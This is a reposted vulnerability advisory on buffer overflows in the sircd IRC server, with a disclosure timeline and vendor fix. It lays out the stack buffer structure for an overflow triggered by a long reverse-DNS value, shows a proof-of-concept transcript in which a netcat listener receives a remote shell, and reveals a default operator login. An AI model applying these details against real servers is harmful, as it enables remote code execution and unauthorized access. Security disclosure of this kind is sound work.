Sircd v0.4.0 and below and v0.4.4 from CVS before 04/02-03 contains buffer overflow vulnerabilities which allow remote users to execute arbitrary code. Exploit available here.
e6cd4e6b3ed5a50f2058983327655cd6782b4cf9f1554404cf8127b30d18f04cI. BACKGROUND
According to the vendor "The 'sircd' project started as an idea from
the QuakeNet IRC Network coding team to develop a completely new irc
server that had none of the problems of the original ircd, such as
instability, scalability issues, redundant, badly written code and
other nasty things. "
More info is available at http://www.sircd.org.
II. DESCRIPTION
a: Insufficient bounds checking leads to execution of arbitrary code.
b: Default oper account matching *!*@*
III. ANALYSIS
a:
Upon checking the reverse dns of a connecting user, if the returned
value is longer than a certain length a classic stack overflow occurs.
The buffer may be constructed as such:
[94 bytes of crap][EBP ][EIP ][400 bytes for nops and shellcode],
leaving us with plenty of space both before and after eip to store our
shellcode.
The accompanying .sh script is a silly proof of concept.
Below is a fabricated copy of a typical run:
[shell 1]
$ nc -l -v -p 10000
listening on [any] 10000 ...
[shell 2]
# ./sircd.sh 127.0.0.1
sircd 0.4.0 proof-of-concept, usage ./sircd.sh <ip-of-attacker>
UID check passed, backing up /etc/hosts
Now connect to the sircd from 127.0.0.1
Press a key and enter to restore /etc/hosts
asd
Game over man, game over
#
[shell 3]
$ sircd &
[1] 75711
$
=====================================
sircd: v0.4.0 Alpha
Author(s)
Zarjazz (zarjazz@barrysworld.com)
=====================================
sircd initialized
SSL initialized
$ BitchX 127.0.0.1
[snip some bitchx output]
[fi] *** Welcome to the_server
[fi] *** Resolving IP 127.0.0.1
--from here on the connection freezes.
[shell 2]
fah
Game over man, game over
#
[shell 1]
connect to [127.0.0.1] from [garbage snipped] [127.0.0.1] 1869
id
uid=1001(sircd-user) gid=1001(sircd-user) groups=1001(sircd-user)
b: type /oper bod bod bod in a connected irc-client.
IV. DETECTION
sircd-0.4.0 shipping with FreeBSD ports as per 03/02-03 is found
to be vulnerable, as well as sircd-0.4.4 from CVS before 04/02-03.
V. WORKAROUND
The fix has been incorporated in the CVS tree as per 04/02-03.
VI. VENDOR FIX
Same as above.
VII. CVE INFORMATION
unknown
VIII. DISCLOSURE TIMELINE
03/02-02 zarjazz@barrysworld.com,ports@freebsd.org notified.
04/02-02 zarjazz@barrysworld.com responded with a fix.
04/02-02 public disclosure.
IX. CREDIT
Knud Erik Højgaard
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed